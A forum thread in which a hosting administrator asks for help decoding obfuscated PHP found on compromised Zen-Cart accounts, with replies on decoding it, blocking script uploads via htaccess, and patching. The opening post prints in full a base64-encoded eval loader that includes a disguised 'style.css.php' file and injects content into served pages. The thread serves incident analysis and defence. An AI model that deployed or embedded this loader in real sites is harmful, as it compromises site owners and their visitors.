Hi there guys,

I found tons of exploit scripts in a 777'ed directory on one of the accounts on my server. I'm plodding through them to see what they do, but one is encoded:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9waXhlbC9wdWJsaWNfaHRtbC9zaG9wL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2h0bWxfaW5jbHVkZXMvY2xhc3NpYy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvcGl4ZWwvcHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9odG1sX2luY2x1ZGVzL2NsYXNzaWMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
<?php 

eval(gzinflate(base64_decode('FZq30oNatoQfZ84U

Ad7VRHhvhIfkFt57z9Pf/6RIwWbt1d1fq1Re6fBP/b

VTNaRH+U+W7iWB/V9R5nNR/vMfMdnkbvVisffBh

bhExgJ9hfzQae89veVvdWMr8K0XBx80Vi0+esB1oQ............

I've truncated it, but wanted to show how it's formed. Is there a way for me to unencode this file to see what it's trying to do?

Also, if anyone would like to take a look at these to help me figure out what might have heppened, I would appreciate it. I don't want to post them for the obvious reasons, but have saved everything.

thanks,
json

    [man]base64_decode[/man]

    ALWAYS remove EVAL() statements or you could get burned

      Thanks very much for the link. Hadn't thought of it as php specific.

      Is there any way to use htaccess to block .php or .txt uploads in particular directories?

        you should restrict that in your upload code...

        however, you can use the files directive in an htaccess to have certain files be not available

        <Files ~ "\.(php|txt)$">
    Order allow,deny
    Deny from all
</Files>
          scrupul0us;10935539 wrote:

          you should restrict that in your upload code...

          Thanks very much for the code. I've found these files on all accounts using the Zen-Cart e-commerce system. Unfortunately, I don't know how they're getting the files onto the server. I just know that all compromised accounts had this system in common.

          thanks again for your help,
          json

            I am dagon, thanks for thinking of it though. I can't figure out how they're getting the files onto the server. They were unable to run any of the scripts on my server, but on another that's not under my control, they were at the very least able to run a zen-specific script that I found. I've gone through the admin sessions and only found lost pw requests from my buddy in Brazil, but I've not got a clue what they were able to do outside the script at the server level.

            thanks,
            json

              You've already found the problem: Zen-Cart e-commerce system

              This you say is the only common denominator across all the sites with the exploit. Make sure that it is up-to-date with any security patches. If it is something provided by your hosting company, then you'll need to contact them about getting it fixed.

                i think its an iframe virus.

                Just replace the eval into echo and add an inner htmlspecialchars( ... )

                and you ill see what is the code doing. if i'm not mistaken.

                And these code not often upload for your server, ther're saving an incoming $_POST variable, and save into your server, or run that code after the form posted..

                  Write a Reply...